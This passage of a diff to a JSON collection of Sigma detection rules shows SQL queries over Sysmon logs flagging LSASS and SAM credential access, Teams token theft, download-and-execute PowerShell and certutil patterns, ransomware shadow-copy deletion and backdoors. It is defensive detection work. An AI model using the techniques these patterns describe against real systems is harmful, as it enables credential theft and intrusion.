Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Some rare backup scenarios", - "PowerShell scripts fixing HiveNightmare / SeriousSAM ACLs" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\' AND CommandLine LIKE '%System32\\\\config\\\\sam%' ESCAPE '\\' AND (CommandLine LIKE '%Copy-Item%' ESCAPE '\\' OR CommandLine LIKE '%cp $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%cpi $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%copy $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%.File]::Copy(%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND CommandLine LIKE '%clipboard]::%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_sam_access.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_clip.yml" }, { - "title": "Powershell ChromeLoader Browser Hijacker", - "id": "27ba3207-dd30-4812-abbf-5d20c57d474e", + "title": "Renamed NetSupport RAT Execution", + "id": "0afbd410-de03-4078-8491-f132303cb67d", "status": "experimental", - "description": "Detects PowerShell process spawning a 'chrome.exe' process with the 'load-extension' flag to start a new chrome instance with custom extensions, as seen being used in 'ChromeLoader'", - "author": "Aedan Russell, frack113 (sigma)", + "description": "Detects the execution of a renamed \"client32.exe\" (NetSupport RAT) via Imphash, Product and OriginalFileName strings", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1176" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\chrome.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%--load-extension=%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product LIKE '%NetSupport Remote Control%' ESCAPE '\\' OR OriginalFileName LIKE '%client32.exe%' ESCAPE '\\' OR Imphash = 'a9d50692e95b79723f3e76fcf70d023e' OR Hashes LIKE '%IMPHASH=A9D50692E95B79723F3E76FCF70D023E%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\client32.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_browsers_chrome_load_extension.yml" + "filename": "proc_creation_win_renamed_netsupport_rat.yml" }, { - "title": "Suspicious Sysmon as Execution Parent", - "id": "6d1058a4-407e-4f3a-a144-1968c11dc5c3", - "status": "experimental", - "description": "Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. CVE-2022-41120)", - "author": "Florian Roth (Nextron Systems), Tim Shelton (fp werfault)", + "title": "WScript or CScript Dropper", + "id": "cea72823-df4d-4567-950c-0b579eaf0846", + "status": "test", + "description": "Detects wscript/cscript executions of scripts located in user directories", + "author": "Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community", + "tags": [ + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" + ], "falsepositives": [ - "Unknown" + "Winzip", + "Other self-extractors" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\Sysmon.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\Sysmon64.exe' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\Sysmon.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\' OR Image LIKE 'wevtutil.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\WerFault.exe' ESCAPE '\\') OR Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\Sysmon.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.jse%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.vba%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\winzip%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2022_41120_sysmon_eop.yml" + "filename": "proc_creation_win_malware_script_dropper.yml" }, { - "title": "PUA - CsExec Execution", - "id": "d08a2711-ee8b-4323-bdec-b7d85e892b31", + "title": "Suspicious Registry Modification From ADS Via Regini.EXE", + "id": "77946e79-97f1-45a2-84b4-f37b5c0d8682", "status": "experimental", - "description": "Detects the use of the lesser known remote execution tool named CsExec a PsExec alternative", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys.", + "author": "Eli Salem, Sander Wiebing, oscd.community", "tags": [ - "attack.resource_development", - "attack.t1587.001", - "attack.execution", - "attack.t1569.002" + "attack.t1112", + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\csexec.exe' ESCAPE '\\' OR Description = 'csexec'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regini.exe' ESCAPE '\\' OR OriginalFileName = 'REGINI.EXE') AND CommandLine REGEXP ':[^ \\\\]')" ], - "filename": "proc_creation_win_pua_csexec.yml" + "filename": "proc_creation_win_regini_ads.yml" }, { - "title": "Sdiagnhost Calling Suspicious Child Process", - "id": "f3d39c45-de1a-4486-a687-ab126124f744", - "status": "experimental", - "description": "Detects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190)", - "author": "Nextron Systems", + "title": "Suspicious Dump64.exe Execution", + "id": "129966c9-de17-4334-a123-8b58172e664d", + "status": "test", + "description": "Detects when a user bypasses Defender by renaming a tool to dump64.exe and placing it in a Visual Studio folder", + "author": "Austin Songer @austinsonger, Florian Roth", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1218" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Dump64.exe in other folders than the excluded one" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\sdiagnhost.exe' ESCAPE '\\' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\calc.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\dump64.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Installer\\\\Feedback\\\\dump64.exe%' ESCAPE '\\')) OR (Image LIKE '%\\\\dump64.exe' ESCAPE '\\' AND (CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_sdiagnhost_susp_child.yml" + "filename": "proc_creation_win_lolbin_dump64.yml" }, { - "title": "Remote Access Tool - ScreenConnect Suspicious Execution", - "id": "75bfe6e6-cd8e-429e-91d3-03921e1d7962", + "title": "Sticky Key Like Backdoor Execution", + "id": "2fdefcb3-dbda-401e-ae23-f0db027628bc", "status": "test", - "description": "Detects ScreenConnect program starts that establish a remote access to that system (not meeting, not remote support)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", + "author": "Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.initial_access", - "attack.t1133" + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.008", + "car.2014-11-003", + "car.2014-11-008" ], "falsepositives": [ - "Legitimate use by administrative staff" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%e=Access&%' ESCAPE '\\' AND CommandLine LIKE '%y=Guest&%' ESCAPE '\\' AND CommandLine LIKE '%&p=%' ESCAPE '\\' AND CommandLine LIKE '%&c=%' ESCAPE '\\' AND CommandLine LIKE '%&k=%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wt.exe' ESCAPE '\\') AND (CommandLine LIKE '%sethc.exe%' ESCAPE '\\' OR CommandLine LIKE '%utilman.exe%' ESCAPE '\\' OR CommandLine LIKE '%osk.exe%' ESCAPE '\\' OR CommandLine LIKE '%Magnify.exe%' ESCAPE '\\' OR CommandLine LIKE '%Narrator.exe%' ESCAPE '\\' OR CommandLine LIKE '%DisplaySwitch.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_remote_access_tools_screenconnect_access.yml" + "filename": "proc_creation_win_cmd_sticky_key_like_backdoor_execution.yml" }, { - "title": "Suspicious Add Scheduled Command Pattern", - "id": "f2c64357-b1d2-41b7-849f-34d2682c0fad", + "title": "Service Registry Key Deleted Via Reg.EXE", + "id": "05b2aa93-1210-42c8-8d9a-2fcc13b284f5", "status": "experimental", - "description": "Detects suspicious scheduled task creations with commands that are uncommon", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of \"reg.exe\" commands with the \"delete\" flag on services registry key. Often used by attacker to remove AV software services", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1053.005" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Software installers that run from temporary folders and also install scheduled tasks" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create %' ESCAPE '\\') AND (((CommandLine LIKE '%/sc minute %' ESCAPE '\\' OR CommandLine LIKE '%/ru system %' ESCAPE '\\') AND (CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\')) OR (CommandLine LIKE '% bypass %' ESCAPE '\\' OR CommandLine LIKE '%.DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% -w hidden %' ESCAPE '\\' OR CommandLine LIKE '% IEX%' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '%/c start /min %' ESCAPE '\\' OR CommandLine LIKE '% curl %' ESCAPE '\\') OR (CommandLine LIKE '%/xml C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%wscript.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '% delete %' ESCAPE '\\' AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\services\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_schtasks_susp_pattern.yml" + "filename": "proc_creation_win_reg_delete_services.yml" }, { - "title": "HackTool - F-Secure C3 Load by Rundll32", - "id": "b18c9d4c-fac9-4708-bd06-dd5bfacf200f", - "status": "test", - "description": "F-Secure C3 produces DLLs with a default exported StartNodeRelay function.", - "author": "Alfie Champion (ajpc500)", + "title": "Suspicious Command With Teams Objects Paths", + "id": "d2eb17db-1d39-41dc-b57f-301f6512fa75", + "status": "experimental", + "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", + "author": "@SerkinValery", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.credential_access", + "attack.t1528" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%StartNodeRelay%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_c3_rundll32_pattern.yml" + "filename": "proc_creation_win_teams_suspicious_command_line_cred_access.yml" }, { - "title": "Suspicious Invoke-WebRequest Usage", - "id": "5e3cc4d8-3e68-43db-8656-eaaeefdec9cc", + "title": "Potential Recon Activity Using DriverQuery.EXE", + "id": "9fc3072c-dc8f-4bf7-b231-18950000fadd", "status": "experimental", - "description": "Detects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location", + "description": "Detect usage of the \"driverquery\" utility to perform reconnaissance on installed drivers", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.discovery" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\') AND (CommandLine LIKE '% -ur%' ESCAPE '\\' OR CommandLine LIKE '% -o%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%driverquery.exe' ESCAPE '\\' OR OriginalFileName = 'drvqry.exe') AND ((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_invoke_webrequest_download.yml" + "filename": "proc_creation_win_driverquery_recon.yml" }, { - "title": "PUA - Fast Reverse Proxy (FRP) Execution", - "id": "32410e29-5f94-4568-b6a3-d91a8adad863", + "title": "Potential Exploitation Attempt From Office Application", + "id": "868955d9-697e-45d4-a3da-360cefd7c216", "status": "experimental", - "description": "Detects the use of Fast Reverse Proxy. frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet.", - "author": "frack113, Florian Roth", - "tags": [ - "attack.command_and_control", - "attack.t1090" - ], - "falsepositives": [ - "Legitimate use" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\frpc.exe' ESCAPE '\\' OR Image LIKE '%\\\\frps.exe' ESCAPE '\\') OR CommandLine LIKE '%\\\\frpc.ini%' ESCAPE '\\' OR (Hashes LIKE '%MD5=7D9C233B8C9E3F0EA290D2B84593C842%' ESCAPE '\\' OR Hashes LIKE '%SHA1=06DDC9280E1F1810677935A2477012960905942F%' ESCAPE '\\' OR Hashes LIKE '%SHA256=57B0936B8D336D8E981C169466A15A5FD21A7D5A2C7DAF62D5E142EE860E387C%' ESCAPE '\\') OR md5 = '7d9c233b8c9e3f0ea290d2b84593c842' OR sha1 = '06ddc9280e1f1810677935a2477012960905942f' OR sha256 = '57b0936b8d336d8e981c169466a15a5fd21a7d5a2c7daf62d5e142ee860e387c'))" - ], - "filename": "proc_creation_win_pua_frp.yml" - }, - { - "title": "Potential Maze Ransomware Activity", - "id": "29fd07fc-9cfd-4331-b7fd-cc18dfa21052", - "status": "test", - "description": "Detects specific process characteristics of Maze ransomware word document droppers", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Office applications executing a child process that includes directory traversal patterns. This could be an attempt to exploit CVE-2022-30190 (MSDT RCE) or CVE-2021-40444 (MSHTML RCE)", + "author": "Christian Burkard (Nextron Systems), @SBousseaden (idea)", "tags": [ "attack.execution", - "attack.t1204.002", - "attack.t1047", - "attack.impact", - "attack.t1490" + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\WINWORD.exe' ESCAPE '\\' AND Image LIKE '%.tmp' ESCAPE '\\') OR (Image LIKE '%\\\\wmic.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%shadowcopy delete' ESCAPE '\\') OR (CommandLine LIKE '%shadowcopy delete' ESCAPE '\\' AND CommandLine LIKE '%\\\\..\\\\..\\\\system32%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\excel.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mspub.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\visio.exe' ESCAPE '\\') AND (CommandLine LIKE '%../../../..%' ESCAPE '\\' OR CommandLine LIKE '%..\\\\..\\\\..\\\\..%' ESCAPE '\\' OR CommandLine LIKE '%..//..//..//..%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_maze_ransomware.yml" + "filename": "proc_creation_win_exploit_cve_2021_40444_office_directory_traversal.yml" }, { - "title": "Port Forwarding Attempt Via SSH", - "id": "327f48c1-a6db-4eb8-875a-f6981f1b0183", + "title": "Powershell ChromeLoader Browser Hijacker", + "id": "27ba3207-dd30-4812-abbf-5d20c57d474e", "status": "experimental", - "description": "Detects suspicious SSH tunnel port forwarding to a local port", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects PowerShell process spawning a 'chrome.exe' process with the 'load-extension' flag to start a new chrome instance with custom extensions, as seen being used in 'ChromeLoader'", + "author": "Aedan Russell, frack113 (sigma)", "tags": [ - "attack.command_and_control", - "attack.lateral_movement", - "attack.t1572", - "attack.t1021.001", - "attack.t1021.004" + "attack.persistence", + "attack.t1176" ], "falsepositives": [ - "Administrative activity using a remote port forwarding to a local port" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\ssh.exe' ESCAPE '\\' AND CommandLine LIKE '% -R %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\chrome.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%--load-extension=%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_ssh_port_forward.yml" + "filename": "proc_creation_win_browsers_chrome_load_extension.yml" }, { - "title": "Taskmgr as LOCAL_SYSTEM", - "id": "9fff585c-c33e-4a86-b3cd-39312079a65f", + "title": "Suspicious Active Directory Database Snapshot Via ADExplorer", + "id": "ef61af62-bc74-4f58-b49b-626448227652", "status": "experimental", - "description": "Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of Sysinternals ADExplorer with the \"-snapshot\" flag in order to save a local copy of the active directory database to a suspicious directory.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036" + "attack.credential_access", + "attack.t1552.001", + "attack.t1003.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND Image LIKE '%\\\\taskmgr.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR OriginalFileName = 'AdExp') AND CommandLine LIKE '%snapshot%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_taskmgr_localsystem.yml" + "filename": "proc_creation_win_sysinternals_adexplorer_susp_execution.yml" }, { - "title": "PUA - AdvancedRun Suspicious Execution", - "id": "fa00b701-44c6-4679-994d-5a18afa8a707", + "title": "Suspicious Windows Update Agent Empty Cmdline", + "id": "52d097e2-063e-4c9c-8fbb-855c8948d135", "status": "experimental", - "description": "Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts", - "author": "Florian Roth (Nextron Systems)", - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%/EXEFilename%' ESCAPE '\\' OR CommandLine LIKE '%/CommandLine%' ESCAPE '\\') AND ((CommandLine LIKE '% /RunAs 8 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 4 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 10 %' ESCAPE '\\' OR CommandLine LIKE '% /RunAs 11 %' ESCAPE '\\') OR (CommandLine LIKE '%/RunAs 8' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 4' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 10' ESCAPE '\\' OR CommandLine LIKE '%/RunAs 11' ESCAPE '\\')))" - ], - "filename": "proc_creation_win_pua_advancedrun_priv_user.yml" - }, - { - "title": "PowerShell Get-Process LSASS", - "id": "b2815d0d-7481-4bf0-9b6c-a4c48a94b349", - "status": "test", - "description": "Detects a \"Get-Process\" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity", + "description": "Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.credential_access", - "attack.t1552.004" - ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Get-Process lsas%' ESCAPE '\\' OR CommandLine LIKE '%ps lsas%' ESCAPE '\\' OR CommandLine LIKE '%gps lsas%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'Wuauclt.exe') AND CommandLine LIKE '%\\\\Wuauclt.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_getprocess_lsass.yml" + "filename": "proc_creation_win_wuauclt_no_cli_flags_execution.yml" }, { - "title": "Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE", - "id": "42a5f1e7-9603-4f6d-97ae-3f37d130d794", + "title": "Potential Suspicious Mofcomp Execution", + "id": "1dd05363-104e-4b4a-b963-196a534b03a1", "status": "experimental", - "description": "Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites.", + "description": "Detects execution of the \"mofcomp\" utility as a child of a suspicious shell or script running utility or by having a supsicious path in the commandline.\nThe \"mofcomp\" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository.\nAttackers abuse this utility to install malicious MOF scripts\n", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.execution", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%urlcache %' ESCAPE '\\' OR CommandLine LIKE '%verifyctl %' ESCAPE '\\') AND (CommandLine LIKE '%.ghostbin.co/%' ESCAPE '\\' OR CommandLine LIKE '%.hastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%.paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%anonfiles.com%' ESCAPE '\\' OR CommandLine LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR CommandLine LIKE '%ddns.net%' ESCAPE '\\' OR CommandLine LIKE 